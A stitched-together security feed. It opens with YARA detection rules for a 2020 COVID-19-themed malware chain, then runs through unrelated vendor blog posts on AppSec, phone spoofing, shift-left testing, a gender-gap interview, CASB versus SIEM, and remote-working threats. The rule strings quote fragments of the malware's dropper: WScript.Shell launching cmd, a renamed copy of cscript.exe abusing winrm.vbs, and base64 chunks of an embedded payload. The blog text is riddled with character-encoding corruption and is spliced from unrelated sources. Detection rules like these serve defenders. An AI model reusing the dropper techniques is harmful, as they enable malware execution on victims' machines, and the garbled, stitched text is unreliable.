      date = "2020-03-17"
      hash1 = "70b8397f87e4a0d235d41b00a980a8be9743691318d30293f7aa6044284ffc9c"
   strings:
      $x1 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x2 = "&for /r C:\\\\Windows\\\\System32\\\\ %m in (cscr*.exe) do copy %m %tmp%\\\\cscript.exe\\\\msproof.exe /y&move /Y %tmp%\\\\cSi1r" ascii
      $x3 = "ss?Handle=4 -format:pretty&del \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /f /q&ping -n 1 127.0.0.1&move /Y %tmp%\\\\48" ascii
      $x4 = "var e7926b8de13327f8e703624e = new ActiveXObject(\"WScript.Shell\");e7926b8de13327f8e703624e.Run (\"cmd /c mkdir %tmp%\\\\cscrip" ascii
      $x5 = "p %tmp%\\\\cscript.exe\\\\WsmPty.xsl&%tmp%\\\\cscript.exe\\\\msproof.exe //nologo %windir%\\\\System32\\\\winrm.vbs get wmicimv2" ascii
      $s6 = "/b %tmp%\\\\2m7EBxdH3wHwBO.tmp+%tmp%\\\\MiZl5xsDRylf0W.tmp \\\"%userprofile%\\\\OFFICE12\\\\Wordcnvpxy.exe\\\" /Y&\\\"%tmp%\\\\2" ascii
      $s7 = "6W.tmp \\\"%userprofile%\\\\OFFICE12\\\\MSOSTYLE.EXE\\\"&move /Y %tmp%\\\\3UDBUTNY7YstRc.tmp \\\"%userprofile%\\\\OFFICE12\\\\OI" ascii
      $s8 = "48-covid-19.pdf\\\"\",0);" fullword ascii
      $s9 = "e7926b8de13327f8e703624e" ascii
   condition:
      uint16(0) == 0x6176 and filesize < 2KB and
      1 of ($x*) and all of them
}

rule sig_3UDBUTNY7YstRc {
   meta:
      description = "yara - file 3UDBUTNY7YstRc.tmp"
      date = "2020-03-17"
      hash1 = "a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e"
   strings:
      $x1 = "cmd /c notepad.exe" fullword ascii
      $x2 = "dllexec.dll" fullword ascii
      $s3 = "cmd /c calc.exe" fullword ascii
      $s4 = "Wordcnvpxy.exe" fullword ascii
      $s5 = "GetOfficeData" fullword ascii
      $s6 = "273<3]3b3" fullword ascii /* Goodware String - occured 1 times */
      $s7 = "2>2K2W2_2g2s2" fullword ascii /* Goodware String - occured 1 times */
      $s8 = "uTVWhY#" fullword ascii
      $s9 = "DeleteOfficeData" fullword ascii
      $s10 = "9#:=:N:" fullword ascii /* Goodware String - occured 1 times */
      $s11 = "URPQQhpB" fullword ascii
      $s12 = "6#6*626:6B6N6W6\\6b6l6u6" fullword ascii /* Goodware String - occured 2 times */
      $s13 = "0#0-030I0N0V0\\0c0i0p0v0~0" fullword ascii
      $s14 = "4.464<4F4L4V4\\4f4o4z4" fullword ascii
      $s15 = "<$=1=;=I=R=\\=" fullword ascii
      $s16 = ">->3>9>O>g>" fullword ascii
      $s17 = "5r5L6T6l6" fullword ascii
      $s18 = "1#1*191>1D1M1m1s1" fullword ascii
      $s19 = ":%:K:Q:{:" fullword ascii
      $s20 = "5(5L5X5\\5`5d5h5" fullword ascii /* Goodware String - occured 4 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and
      ( pe.imphash() == "abba83cce6a959dc431917a65c5fe7ca" and ( pe.exports("DeleteOfficeData") and pe.exports("GetOfficeData") ) or ( 1 of ($x*) or 4 of them ) )
}

rule sig_20200308_sitrep_48_covid_19________pdf {
   meta:
      description = "yara - file 20200308-sitrep-48-covid-19.pdf.lnk"
      date = "2020-03-17"
      hash1 = "d54d85e3044a05bdafee9f30f7604ee584db91944a5149cc9e0f65f381d85492"
   strings:
      $x1 = "TVNDRgAAAADWPw0AAAAAAEwAAAAAAAAAAwEFAAYAAACtJwAAKgEAABsAAQAT6QsAAgABAC5lDAADAAEARvcMAAEAAQBbOA0AAQABABUTDQAAAAAAAABpUJOkIAAyMDIw" ascii
      $s2 = "jS61LWA3O0LZjbyOyM+Th5BHkL/6NtKERZApZAvWg3QiB7HuGbdfdfIMVwXLDLL9nVOdKplM1TlFlO5ESifhf5tgzpqP9DZt2dfrfTPS/+ZIBLzWJ99g9xXWv91bOiOD" ascii
      $s3 = "wXEkU5x/pIsmFrJtNHbdwG+bszpTRFThzR7p/shOst0DW0ZFKeRdhc/kM7yZKiZM0LkwrconqjQ3wYPZ7MTqq6M91IEWmt0TYiRCrUlVHk0W63x4OVNkZBjH3umhhGbW" ascii
      $s4 = "pUnp5YF5MVzpQVVZGZ3vjyftPMSfwPbgfq+oOoRAAyP6ZnheN9Or9fx8glHHDnXKm8PTjPiuhWhq74VNkEWr+gACxYi/wwj+yrQNyWULOGigcjQQ6ze7Zgp48Bny4X8v" ascii
      $s5 = "1WxCb+ZUBMNpgdQ9VM6Pbm/a3lOho1gNxYjJoenk4InBUmvbgaGreBVEPcshY3J0VUdR35An5FULDqPNKxb5raGeTLpm5548XATYLogWT8E22FhAi+V4d0q3ck1gZSqw" ascii
      $s6 = "GEeEP7OJ3H9kNW2EPOUbKglcK2+vp//RmYt0D/CDulYi6iBikEye9CzxoMuCHgaF8hfJC8DaiQG6B/+lrCggdq54tM4fP9SAqhqBWxW1YVMoKHKrLKhWRlMhlYtoUDbV" ascii
      $s7 = "H/sC8wh3rLxj+gB3VC89yuytzdbGEK3P9U2mmfZGvCPYQlBQgXUXRc8UuNfknuIxjz3CsTDq0QPYPvLj9sHAaK6EoZ3tzZGNYDZBV1szVLoGm4wtS68/jiqvVtmPtKB6" ascii
      $s8 = "fauCRyQIlXVt+r5GYoBBBlfOQqImEkWo6+WlQTSwYS6smIFGhlOgf7AQ4ovS1utu5CdOQaEjc8UwcEx752927tdeRp8xVz4LlZVh/2KEKumMtVfbk1vucomNeqcRsJi6" ascii
      $s9 = "yd2OnvWZvuUQw3aLFzorH9uYxOItXtCmdMmUJP9GKGsdR2VRmYbpkfJ9I5JlbjB2nR28vsrlyOLvHeftPpJaqAb2+eY3ks7r6ewL6JeeS12Gw+8/OrnmTiIrWapEgObL" ascii
      $s10 = "RhSzuRlKjfLOgyDj4lOfKOsiZNdxLSHCfbS/kEYl0BslYnQ7YtwYOHZlbWNtSdEUhvb4kKsY/+AobmfLilpGotYo3vEBKu8hhbFE1Jrc+GYGxDRue6300wqLbdIKezBr" ascii
      $s11 = "cFHaggy5a+rMrMKC4rKmWdNudM/QWEwp2clOa3lRns1Y4qmtaE5STCmdnj+hITcnvc5eyekbDY568+RUHAxtOr8y3S/vmt9OfY7y/dLNNNLQofyTgt4T7G3abUZ1bNG1" ascii
      $s12 = "VjEg4DubcQ2BtwOwevQAyxdM/FzIuPehNRKJnyLk8q2jPd+UucexECuRJKkRJ0NnnGBEv7sjLuODcKIJHEX8JgyVAcq/DoPewYcsHY8Rh9NeC2fnR6OLLctWM2n53KUn" ascii
      $s13 = "nS8AHUkUzud+yCzW6SCpcW1LiQEWsA8B0zucbgdLVskYWhOLinfePmJ6k6CUgOpcd8fVzMTGRbjV6YyhJjWxlOGgyp7v+q5MGCVbXGwpGM/1xk73XpXhTTPABA+Atm1v" ascii
      $s14 = "KeyEC9M1uHqOE/KCRd902gmpYSK9Ep1sCtzpOqSfNfLHLGoTxu3zjMaEjJ8Dw4/VNYHZo4t5c2CPkSZskDGEYG9rz8HeDf4+Hd3t7y/CyEFD89WV2zsspTFMHnSiyp3t" ascii
      $s15 = "CcCdVZZhyydWDx5BFEKNrLqFB/YFtIaCbuk52NxcwOWQ4muYqVQDbXvcIi/mrR2bXPO1koVLNJbK28cDGFSGXFGg9YXl+YxZkEYe14fqauAf3E/rZcpNs5kCKmv5y5W4" ascii
      $s16 = "cnhkpPaBto41NCLi/eWl360SSHxRUUZsmZ2dnY3wlvb2T+Nu2mRSpYtAlikPNxFZa8nOIodAkeyEVi1SsSRQngbhvRq5LpJOPh4ldQ1N+56agooQr+W0oFa2KXNsEetV" ascii
      $s17 = "FIwtpdre2Wmnc21tda09FKpZefVL43grfymCTd5K56sLOgontwiwYn1nYgVnGJPP/LVQ4JKa1rFFA3Y0HSBBKwuTrFmOAdIJwhoTUrZzBokdMSD931UQuVHTXaMnRz10" ascii
      $s18 = "VGO9VokrQADVECqvw3oyurkmSN5/sSpYnNf7Wi/ECAUmGg/S5qDAyFTPbyfhqOI58HyFRC846KnQDdn72pSAno4kdaeMLOelzq3b6bXV5l2VPj4wQfNl0GZCuJMn7LTR" ascii
      $s19 = "TXxf/IllO3bWzFUJaAMLlRUnogcNa2x0VENzHR6cEaOx79lHSoQxYVHwSUfmEjZoZ2pROh7H1UCMdmJR/3wD2YF9x4MoF5dJQiiAhb4NH9781LGhwW6JqODySrvw3EGT" ascii
      $s20 = "lTvLNEAvdSOFqYwbinqsSVNmUDf6zYKeYafaDjqm8gebMsHURHBynktlSzDsefxSefP1Q1h15TkkR3m/j6/umso0tMFngezzB4SUvUoqb1BMzfPSHU+4EpvSvStNQjKe" ascii
   condition:
      uint16(0) == 0x5654 and filesize < 3000KB and
      1 of ($x*) and 4 of them
}

rule sig_486AULMsOPmf6W {
   meta:
      description = "yara - file 486AULMsOPmf6W.tmp"
      date = "2020-03-17"
      hash1 = "604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d"
   strings:
      $x1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s2 = "emblyIdentity type=\"win32\" name=\"Microsoft.VC80.CRT\" version=\"8.0.50608.0\" processorArchitecture=\"x86\" publicKeyToken=\"" ascii
      $s3 = "0Mscoree.dll" fullword ascii
      $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><assemblyIdentity version=\"1.0.0.0\" processorArch" ascii
      $s5 = "t:\\misc\\x86\\ship\\0\\oinfop12.pdb" fullword ascii
      $s6 = "_tWinMain (Ship) commandline='%s'" fullword ascii
      $s7 = "PrintPostScriptOverText" fullword wide
      $s8 = "InstallLang" fullword wide /* base64 encoded string '"{-jYKjx' */
      $s9 = "re=\"X86\" name=\"OINFOP12.EXE\" type=\"win32\"></assemblyIdentity><description>OInfo</description><dependency><dependentAssembl" ascii
      $s10 = "SetOfficeProperties -- PublisherPageSetupType" fullword ascii
      $s11 = "\\ship\\0\\oinfop12.exe\\bbtopt\\oinfop12O.pdb" fullword ascii
      $s12 = "GetOffice type for '%S'" fullword ascii
      $s13 = "TemplateCount" fullword wide
      $s14 = "Win32_Word12Template" fullword wide
      $s15 = "'OInfoP12.EXE'" fullword ascii
      $s16 = "Queued_EventDescription= " fullword wide
      $s17 = "COfficeObj::Initialize, user='%S', namespace='%S'" fullword ascii
      $s18 = "TabIndentKey" fullword wide
      $s19 = "Win32_WebConnectionErrorMessage" fullword wide
      $s20 = "OInfo12.OCX" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 300KB and
      ( pe.imphash() == "3765c96e932e41e0de2bd2ed71ef99ad" or ( 1 of ($x*) or 4 of them ) )
}

The Evolution of AppSec: Past, Present, and Future

In a recent podcast with IDG, Chris Wysopal, Veracode Chief Technology Officer, speaks to the evolution of application security (AppSec) over the past ten years. In his evaluation, Wysopal leverages findings from Veracode???s annual State of Software Security (SOSS) reports. The first volume of the SOSS report, published in March of 2010, focuses on explaining and advocating for an application security (AppSec) program. By the tenth volume ??? the most recent addition ??? the focus shifts to building out an AppSec program.

The gradual transition from AppSec awareness to AppSec program planning, indicates a clear understanding of the importance of securing applications. In fact, there has been a 50 percent increase in the number of applications scanned for vulnerabilities. But despite the significant increase in scanned applications, vulnerabilities are growing. The only vulnerabilities that have seen a decline, are those considered to be ???high-severity.??? This finding points to a new trend ??ヲ more applications are being scanned, but critical flaws are being prioritized when it comes to remediation. ツ?

There are two ways of looking at this trend. On the one hand, if an organization is new to AppSec, it is practical and advisable to fix high-severity flaws first. On the other hand, AppSec has been around for quite some time, so organizations need to work on maturing their AppSec programs. A mature, best-practice AppSec program does not favor certain applications or flaws, it scans all applications and remediates all flaws.

Making security a standard way of building software aligns with DevSecOps, in which security is organically woven into development and operations. Moving to DevSecOps requires organizations to break down silos and establish a working relationship between development and security teams. Once relationships are formed and security and development teams start to understand each other???s roles, a ???security champions??? program can be implemented. Security champions are developers who agree to learn more about security and advocate for it in the build process.

Better yet, Wysopal proposes that colleges and universities start incorporating security into computer engineering curriculums. By instilling the need for application security into the minds of future developers, DevSecOps will become commonplace.

To learn more about AppSec???s progression, or to hear Chris Wysopal???s view on the future state of AppSec, download to our podcast, AppSec Grows Up: A Hard Look at Software Security. ツ?

ツ?

How To Stop Phone Spoofing

How Does Phone Spoofing Work?

Call spoofing is when the caller deliberately sends false information to change the caller ID. Most spoofing is done using a VoIP (Voice over Internet Protocol) service or IP phone that uses VoIP to transmit calls over the internet. VoIP users can usually choose their preferred number or name to be displayed on the caller ID when they set up their account.

Some providers even offer spoofing services that work like a prepaid calling card. Customers pay for a PIN code to use when calling their provider, allowing them to select both the destinations number they want to call, as well as the number they want to appear on the recipient’s caller ID.

What Are The Dangers of Phone Spoofing?

Scammers often use spoofing to try to trick people into handing over money, personal information, or both. They may pretend to be calling from a bank, a charity, or even a contest, offering a phony prize. These “vishing” attacks (or “voice phishing”), are quite common, and often target older people who are not as aware of this threat.

For instance, one common scam appears to come from the IRS. The caller tries to scare the receiver into thinking that that owe money for back taxes, or need to send over sensitive financial information right away. Another common scam is fake tech support, where the caller claims to be from a recognizable company, like Microsoft, claiming there is a problem with your computer and they need remote access to fix it.

There are also “SMiShing” attacks, or phishing via text message, in which you may receive a message that appears to come from a reputable person or company, encouraging you to click on a link. But once you do, it can download malware onto your device, sign you up for a premium service, or even steal your credentials for your online accounts.

Why Is Spoofing So Prevalent?

The convenience of sending digital voice signals over the internet has led to an explosion of spam and robocalls over the past few years. In fact, according to Hiya, a company that offers anti-spam phone solutions, spam calls grew to 54.6 billion in 2019, a 108% increase over the previous year.

Since robocalls use a computerized auto dialer to deliver pre-recorded messages, marketers and scammers can place many more calls than a live person ever could, often employing tricks such as making the call appear to come from the recipient’s own area code. This increases the chance that the recipient will answer the call, thinking it is from a local friend or business.

And because many of these calls are from scammers or shady marketing groups, just registering your number on the FTC’s official “National Do Not Call Registry” does little help. That’s because only real companies that follow the law respect the registry.

What Can I Do To Stop Spoofing Calls?

To really cut back on these calls, the first thing you should do is check to see if your phone carrier has a service or app that helps identity and filter out spam calls.

For instance, both AT&T and Verizon have apps that provide spam screening or fraud warnings, although they may cost you extra each month. T-Mobile warns customers if a call is likely a scam when it appears on your phone screen, and you can sign up for a scam blocking service for free.

There are also third-party apps such as RoboKiller and Nomorobo that you can download to help you screen calls, but you should be aware that you will be sharing private data with them.

Other Tips For Dealing With Unwanted Calls

  1. After registering for the Do Not Call Registry and checking out your carrier’s options, be very cautious when it comes to sharing your contact information. If an online form asks for your phone number but does not need it, leave that field blank. Also, avoid listing your personal phone number on your social media profiles.
  2. If you receive a call from an unrecognized number, do not answer it. You can always return the call later to see if it was a real person or company. If it was a scam call, you can choose to block the number in your phone, but that too can be frustrating since scammers change their numbers so often.
  3. You can report unwanted calls to the FTC.
  4. Read the privacy policy on every new service you sign up for to make sure that they will not share or sell your contact information.
  5. Be wary of entering contests and sweepstakes online, since they often share data with other companies.
  6. Stay up-to-date on the latest scams, so you know what to look out for, and install mobile security on your phone to help protect you from malware and other threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Stop Phone Spoofing appeared first on McAfee Blogs.

NICE Webinar: NICE Cybersecurity Workforce Framework Use Cases and Success Stories

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Frank Cicio CEO / Founder, iQ4 Corporation Jung Lee Chief Product Officer, CyberVista Simone Petrella CEO, CyberVista Synopsis: The NICE Cybersecurity Workforce Framework is a reference resource that helps to create an integrated ecosystem for employers, education and training providers, and learners. Advocating for the use of the NICE Framework is strengthened through the identification of use cases and success stories that can illustrate applications and uses that benefit all of the stakeholders. This webinar

4 First Steps to Help Your Organization Shift AppSec Left

In order to stay competitive in today???s fast-past world, organizations need to rapidly deploy new software. One way to ensure fast deployment is to take Beyoncテゥ???s advice and move security, ???to the left, to the left.??? By shifting security left ??? to the beginning of the software deployment lifecycle (SDLC) ??? there are significant business benefits. Running security tests early enables organizations to identify and remediate flaws while developers code, eliminating extensive rework and unforeseen expenses down the line. But despite realizing the importance of shifting security left, many organizations can???t figure out where to begin.

Here are four steps that can help your organization get started.ツ?

1) Automate security from day one.

You need to do everything you can to create as little extra work for developers as possible. Since developers automate their processes, automating security scans will not only work seamlessly with their existing processes, it will reduce the need for manual work.

If you decide to automate security, the first thing you should do is look at what tools you have in place, then use APIs toツ?integrate security toolsツ?into the CI/CD pipeline. Most of our customers start by automatically kicking off static analysis scans in the build process.

2) Integrate security tests as you code.

After you automate static scans in the build process, think about integrating security tests even earlier in the SDLC. The sooner the flaw is discovered, the faster and cheaper it is for the developer to remediate. Ideally, security testing isツ?integrated into the IDE, and flaws are discovered while the developer codes.

When deciding what stage in development to start testing, you need to consider the type of application you???re working with. For example, web applications created for modern development practices like microservices can be tested quickly and easily at the beginning of the SDLC, but legacy apps ??? which tend to be more monolithic ??? may take longer to test and require you to scan later in the lifecycle.

3) Avoid false positives with modern AppSec tools.

Originally, application security tools were designed for security professionals only. The tools would flag anything that looked out of the ordinary, and then the AppSec professionals would weed out code that was mislabeled as problematic ??? also known asツ?false positives.

But now that we know the importance of moving security tests to the beginning of the SDLC, tools need to be developer friendly. In order to be developer friendly, the tools need to have a low false-positive rate. Why? Because developers don???t typically have enough security knowledge to quickly identify false positives. Also,ツ?false positivesツ?create rework for developers, slowing down deployments.

Seek out new, modern AppSec tools designed to limit false positives.

4) Shift security knowledge left.

When you move security to the beginning of the SDLC, developers are expected to take a more active role in application security testing. Since most developers don???t have formal security training, it can be challenging to get developers to prioritize security protocols.

One way to help make developers more security-minded is to create a relationship between the security and development teams. If the two teams understand each other???s??? priorities and pain points, developers will be more willing to embrace and learn about security, paving the way for aツ?security champions program. Security champions are developers who have an interest in learning more about security. They undergo formal training and become security advocates on their development team. When you have a security champion program, security becomes top of mind for developers, improving the quality of code, reducing bottlenecks at the security review stage, and increasing the speed to deployment.

Toツ?kickツ?off a security champions program, gain buy-in at the management levelツ?and ensure that security is a shared goal between security and development teams.

Shifting security left might seem like a heavy lift in the beginning, but the payoff is well worth it. Your organization will be able to find and remediate flaws and deploy new software faster, giving your organization a competitive advantage.

Learn more about shifting security left in our recent guide,ツ?AppSec Best Practices vs Practicalities: What to Strive for and Where to Start.

One Veracoder’s Climb Over the Glaring Gender Gap in Tech

"It is amazing what a woman can do if only she ignores what men tell her she can???t." ???ツ?Carol K. Carr

It???s no secret that there???s a gender gap in technology. While the wage gap is languidly closing between male and female computer programmers, it looms large as an indicator that there is still work to be done. According to Girls Who Code, by 2027, only 22 percent of computer scientists will be women ??? that???s a drop from 24 percent in 2017 and 37 percent in 1995. Reversing this trend comes down to acknowledging it and encouraging young women to look beyond what society tells them they???re meant to pursue in life.

As more schools integrate programming and coding course requirements early on, it???s vital that young women can clearly see their seat at the table. So how do we prepare them for the fight they???ll inevitably face if they enter the world of programming, or introduce them to computer science altogether? By sharing the stories of women who came before them and understanding that some must build their own seats from scratch.

Take Mary Allen Wilkes for example, who fell into a computer programming job at the Massachusetts Institute of Technology in 1960. Mary was unsure of which direction to take her career after graduating from college and recalled that, by chance, her high school geography teacher had suggested she become a computer programmer. Mary didn???t even know what a computer was at that point, but after graduating from Wellesley College in 1959, she headed straight to MIT to inquire about computer programming jobs. Before long, Mary was a programming prodigy working on the IBM 704 and later the LINC computer, which is considered the first ???personal computer??? by many in the industry.

Mary???s story isn???t far off from how other women enter the world of computer science today. One of Veracode???s own employees, Lupita Carabes, was introduced to programming by happenstance and discovered firsthand just how large the gender gap in software engineering is. We asked Lupita to share her story for Women???s History Month in hopes that it will help inspire the next generation of girls and women to uncover otherwise unseen male-dominated career paths. ツ?

What is your role at Veracode and which roles have you held in Engineering in the past?

I???m currently an Application Security Account Executive at Veracode, though previously I was an Application Security Software Developer. I was also a firmware/software developer intern during my senior year for the connectivity team at HP, working with WiFi-Direct and BLE technologies. I was the only one with Android mobile app development experience on the team at the time and helped prototyped concepts that would normally be outsourced to a third-party application development firm to validate technical feasibility.

What did you study in school that brought you to a career path in Software Engineering?

I never knew Engineering was a career option until my senior year in high school. I was in AP Calculus 2, AP Physics, and AP Computer Science. I was naturally good at mathematics, so those subjects intrigued me more. English is my second language, so I found reading and writing more challenging. Through the Boys and Girls Club mentorship program, I was fortunate to attend LaSalle Catholic College Preparatory on a scholarship. I graduated with honors and earned first place in a competition for a full ride scholarship to the University of Portland, where I earned my degree in Electrical Engineering and a minor in Computer Science.

In what ways were you exposed to computer science growing up?

My parents have always been very entrepreneurial as a result of having to make their own way.ツ? They instilled core values that drove me to seek out opportunities. My dad ran his own local non-profit television show to educate the Latino community, so I spent a lot of time volunteering and it inspired me to learn about film and photography. I joined a program that helped me save money to buy my own camera; for every dollar I put in they put in two through a local bank. Then, my dad took out a loan and we started a wedding/special occasion video and photography business.

I loved the arts. Before discovering my capabilities in the mathematical world, I applied and was admitted to a very competitive arts magnet school, Da Vinci Arts. During my time there, I kept skipping math levels and I was encouraged to explore that talent. I ended up transferring back to my local neighborhood school in the 8thツ?grade and competed for a full ride to the private Catholic Prep.

The same program I was admitted to also provided the opportunity to compete for a full ride to college upon graduation. While I excelled at math and loved the Arts, not having the reading and writing skills necessary to stand out amongst my peers meant that I needed to think of ways to be financially independent in case I couldn???t afford college.

That???s how I signed up for a web development course. I wanted to create a website to market my family???s photography and video services at a greater scale. There was a mix-up with enrollment, and I ended up in AP Computer Science 101 instead. The rest is history.

What are a few of the biggest reasons you feel a lot of young girls and women don???t decide to follow a career path in computer science?

I think it comes down to the lack of role models. I had no idea that my love for mathematics would lead me down this path. I knew I could never be a nurse; I couldn???t spell or correctly pronounce half the words in biology. I knew about occupations like teacher, lawyer, etc. but I read too slowly, writing wasn???t my forte, and I was very shy. The list could go on. I didn???t see women around me in programming careers, so it never occurred to me that I could branch out beyond other common roles. I think this is a problem a lot of young women face.

"Each time a woman stands up for herself, without knowing it possibly, without claiming it, she stands up for all women." ???ツ?Maya Angelou

We???ve seen that there is a gender gap between front-end and back-end developer roles. Why do you think that is, and what are some ways you think we can close those gaps?

It comes back to the stigma of left brain vs. right brain. Creativity vs. logic. Front-end is ???visual and easy,??? while back-end is ???complex and too difficult.??? The stigma around gender roles in technology is clear in most cases: there???s an assumption that women should take on the ???easier??? creative and visual roles, while men should take on the complex and ???difficult??? roles. I think we can close these gaps by sharing more stories like mine. The first coders were women. As a society, we have made progress, but we have a long way to go.

How can male developers become allies for female developers in the workplace?ツ?ツ?

My personality has evolved significantly over the years, but Engineers typically spend more time thinking than talking (at least I did before I gained the confidence to speak up). This environment makes it difficult to collaborate. So, often it???s hard to show off your strengths or work on your weaknesses. I think collaboration solutions like Slack lessen the anxiety a bit because they open the lines of communication. Male or female, it???s important to understand differences and be open to learning more about each other as people. That???s how we break down walls and close gender gaps.

What is some of the best advice that former managers have given you? Were there times when former managers could have given you better career guidance or support?

My career path has taken some interesting turns, but it all kind of makes sense when you look at the bigger picture. The best advice I???ve received is to seek out mentors. I???ve had some instrumental people in my life that have guided me through my journey. I could???ve been better supported when I went against the grain and challenged social norms. I???ve had people tell me to do as I am told, speak less, not admit when I don???t know something, and so on. To me, that is very counterproductive for any work environment, let alone for women in a male-dominated industry.ツ?

Can you talk about how Veracode handles these issues, from your experience?

Veracode does a wonderful job putting female role models in leadership positions, which in turn translates into a culture that inspires women to seek new heights in their careers. I???ve said it before, and I???ll say it again. When I grow up, I want to be Sam King.ツ?

Veracode???s culture has allowed me to cultivate every aspect of my brand in this industry. I???ve never felt so confident and empowered. Never in a million years did I think I would be working with million-dollar companies, providing consultative advice to C-level executives and Engineers with accolades and patents galore, helping secure their software.ツ? The girl who didn???t even know what software was is now seen as someone with a demonstrated history of working in this space. I couldn???t be more grateful!

"Step out of the history that is holding you back. Step into the new story you are willing to create.??? ???ツ?Oprah Winfrey

Stay tuned for more blog posts in this series as we explore the gender gap many female developers face, and discuss how we, as a community, can reverse the trend. ツ?

ツ?

Why do I need a CASB for Shadow IT when I already have a SIEM?

Why does my organization need to have a Shadow IT solution when we already own a Next-Gen Firewall / Web Proxy and have all the logs in a Security Information and Event Management (SIEM) solution?

This is a question we are often asked by our customers. The answer is that MVISION Cloud CASB allows organizations to uncover Shadow IT usage that is not visible via a query in a SIEM or with Next-Generation Firewall (NGFW) / Secure Web Gateway (SWG) tools. NGFW and Web Proxies typically catalog web services using a category and a reputation score. So, a Russian email service, like mail.ru, would simply be categorized as “Web-based Email” with “Trustworthy” reputation. A typical output of a web reputation score from NGFW / SWG is shown below.

Source: WebRoot BrightCloud Threat Intelligence

What it doesn’t tell you is that mail.ru is hosted in Russia, that it does not encrypt user data at rest, and that it is a source of leaks to the Darknet. It’s definitely not the kind of site a security-conscious organization would want its employees using at work.

The reason for this discrepancy in cloud service assessment is that NGFW/SWG products primarily look at a cloud services from a traditional cyber security perspective: Is the site a source for spam, web attacks, malware, etc.? MVISION Cloud CASB starts there, and also looks at the cloud service business risk. MVISION Cloud provides each cloud service a risk score based on an assessment of 46 control points, covering over 240 risk attributes. Furthermore, McAfee MVISION Cloud maintains a detailed registry of over 26,000 cloud services, with approximately 100 new services added to the registry each month. For comparison, the registry of a leading NGFW vendor currently has a little over 3,000 services. The good news is that Shadow IT data discovered by MVISION Cloud can be consumed by an organization’s existing security stack to block user access or limit the scope of user activity within a service. Here’s how this service ranks in MVISION Cloud:

McAfee often gets asked the following question: If Shadow IT findings are based on web traffic log data stored in a SIEM, why can’t I find information about an organization’s Shadow usage directly from a SIEM console? The main reason is that a SOC analyst doesn’t know what he doesn’t know. If asked “Show me all PDF converters hosted outside of US that are used on organization’s network,” where does a SOC analyst even start, what does he search for?

The easier route is to utilize McAfee MVISION Cloud CASB and search the MVISION Cloud Registry for “Document Conversion” services and see which unsanctioned PDF converters are “in use.” The SOC analyst can then send the MVISION Cloud Registry data about the suspect services directly to a SIEM via API. This data can now be used to seed searches within the SIEM tool for further analysis by SOC analyst.

Another scenario where MVISION Cloud makes a traditional SIEM more “cloud aware” is logging URL space for complex services. For example, if a SOC analyst wants to block Netflix and creates a rule to block all *.netflix.com URLs, he will be surprised to find that Netflix is not actually blocked, and users can still access the content. The reason for this is that most NGFW/SWG products know of only a handful of ways to get to a cloud service. MVISION Cloud, through its crowd sourcing approach, knows of 100s of ways to get to a cloud service and updates these as URLs change. Going back to the Netflix example, below is a screenshot from the MVISION Cloud console showing some of the other URLs associated with the video streaming service.

If a SOC analyst searches for *.netflix.com in a SIEM console, he will only get a partial view of all Netflix activity. The SOC analyst would need MVISION Cloud to figure out the *.nflxvideo.net domains and other ephemeral URL strings to get a complete view of the Netflix service on the organization’s network. Ultimately, MVISION Cloud for Shadow IT should be used as a complimentary tool to an organization’s SIEM capability. It’s a symbiotic relationship. An organization’s SIEM is the source of Shadow IT data for MVISION Cloud, but it is MVISION Cloud that makes the SIEM tool cloud aware.

Keep reading about MVISION Cloud here.

The post Why do I need a CASB for Shadow IT when I already have a SIEM? appeared first on McAfee Blogs.

Staying Safe While Working Remotely

Special thanks to Tim Hux and Sorcha Healy for their assistance.

The demand for remote working as a result of the COVID-19 pandemic will invariably place pressures on organizations to ensure the availability of corporate resources in geographic locations outside of corporate control. Such demands go beyond the provision of additional capacity, with potentially remote working policies and security awareness assets in urgent need of updating and communication.

These demands are being required against the reported backdrop of cybercriminals and potential nation states continuing and even leveraging the global crisis for their own personal gain. Without respite, many cybercriminal groups appear to be continuing attacks against many sectors including healthcare. Furthermore, there are even those threat actors actively using concern related to COVID-19 as a lure to invoke user behaviour. This post is not intended to be exhaustive and will be updated as we make more resources available to enable organizations and users to stay safe and connected.

Threat Landscape

We have identified and reviewed multiple reports related to the criminal use of COVID-19 as potential bait, whether that be phishing emails, domains, malware, etc. While its use is not unexpected, with criminals always trying to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. Our subsequent focus at this time is to attempt to determine whether any geographies specifically being targeted. The chart below maps our visibility of the targets for all known (at the time of writing) threats leveraging COVID-19.

Figure 1. Targeted COVID-19 related threats by country

As we see, the geographic dispersion of “targets” is relatively wide and includes many countries we typically see on the list of broader phishing targets. However, there are some anomalies, in particular Panama, Taiwan, and Japan. This requires us to undertake further analysis but does suggest that certain campaigns may be targeting specific countries.

It is equally important to add that this landscape is changing daily, with more threats being identified and included as part of our detection across the entire product portfolio (where appropriate). Moreover, the McAfee Advanced Threat Research (ATR) team is undertaking deeper analysis into the findings to understand why certain countries are receiving more threats related to COVID-19 than others, as well a deeper dive into sector analysis. We will regularly report any relevant details, and of course share all IoCs with the wider community to ensure we all remain safe.  As we continue to hunt for further threat artefacts, we will make our findings available through this forum.

Working from home threats contextualized

All over the world large numbers of people are rushed to work from home unprepared, sometimes even from their personal devices. Often, these devices are not maintained with proper security measures and possibly leave organizations open to various attacks.

Over the last year we have published several articles on how targeted ransomware attacks are fuelling the increased demand in the underground for compromised corporate networks. One often-used criminal access method is through “commodity malware,” such as banking malware and info-stealers. The criminals are actively sifting through thousands of logs hoping to find corporate network or remote management credentials.

Commodity malware is often focused directly at consumers, so accessing corporate networks from possible pre-infected personal machines without adequate security measures creates a much larger attack surface for cybercriminals. This increases the risk of an organization falling victim to a potential breach and ransomware lockdown.

